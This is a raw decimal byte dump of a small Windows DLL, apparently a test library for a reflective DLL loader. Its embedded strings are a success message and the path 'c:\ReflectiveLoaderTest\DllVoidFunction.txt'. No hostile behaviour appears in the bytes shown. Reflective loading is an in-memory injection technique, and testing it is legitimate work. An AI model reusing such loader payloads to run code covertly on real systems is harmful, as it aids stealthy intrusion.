204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,139,255,85,139,236,185,108,35,2,16,232,111,54,255,255,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,32,202,1,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,112,130,1,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,242,155,216,86,0,0,0,0,2,0,0,0,125,0,0,0,200,7,2,0,200,247,0,0,68,108,108,32,86,111,105,100,32,102,117,110,99,116,105,111,110,32,115,117,99,99,101,115,115,102,117,108,108,121,32,99,97,108,108,101,100,46,10,0,0,0,0,0,0,0,0,0,99,58,92,82,101,102,108,101,99,116,105,118,101,76,111,97,100,101,114,84,101,115,116,92,68,108,108,86,111,105,100,70,117,110,99,116,105,111,110,46,116,120,116,0,0,0,0,0,0,0,0,0,99,58,92,82,101,102,108,101,99,116,105,118,101,76,111,97,100,101,114,84,101,115,116,0,0,0,0,0,96,9,2,16,95,16,1,16,0,0,0,0,0,0,0,0,96,0,0,0,0,0,0,0,0,0,0,0,116,11,2,16,66,20,1,16,175,21,1,16,236,20,1,16,53,18,1,16,130,21,1,16,20,16,1,16,152,19,1,16,100,16,1,16,72,19,1,16,241,20,1,16,130,16,1,16,97,19,1,16,228,18,1,16,248,18,1,16,10,21,1,16,0,0,0,0,0,0,0,0,0,0,0,0,34,0,111,0,117,0,116,0,32,0,111,0,102,0,32,0,114,0,97,0,110,0,103,0,101,0,34,0,0,0,0,0,0,0,0,0,115,0,116,0,100,0,58,0,58,0,95,0,83,0,116,0,114,0,105,0,110,0,103,0,95,0,99,0,111,0,110,0,115,0,116,0,95,0,105,0,116,0,101,0,114,0,97,0,116,0,111,0,114,0,60,0,99,0,104,0,97,0,114,0,44,0,115,0,116,0,114,0,117,0,99,0,116,0,32,0,115,0,116,0,100,0,58,0,58,0,99,0,104,0,97,0,114,0,95,0,116,0,114,0,97,0,105,0,116,0,115,0,60,0,99,0,104,0,97,0,114,0,62,0,44,0,99,0,108,0,97,0,115,0,115,0,32,0,115,0,116,0,100,0,58,0,58,0,97,0,108,0,108,0,111,0,99,0,97,0,116,0,111,0,114,0,60,0,99,0,104,0,97,0,114,0,62,0,32,0,62,0,58,0,58,0,111,0,112,0,101,0,114,0,97,0,116,0,111,0,114,0,32,0,42,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,34,0,83,0,116,0,97,0,110,0,100,0,97,0,114,0,100,0,32,0,67,0,43,0,43,0,32,0,76,0,105,0,98,0,114,0,97,0,114,0,105,0,101,0,115,0,32,0,79,0,117,0,116,0,32,0,111,0,102,0,32,0,82,0,97,0,110,0,103,0,101,0,34,0,32,0,38,0,38,0,32,0,48,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,83,116,97,110,100,97,114,100,32,67,43,43,32,76,105,98,114,97,114,105,101,115,32,79,117,116,32,111,102,32,82,97,110,103,101,0,0,0,0,0,0,0,0,0,0,0,0,0,115,0,116,0,114,0,105,0,110,0,103,0,32,0,105,0,116,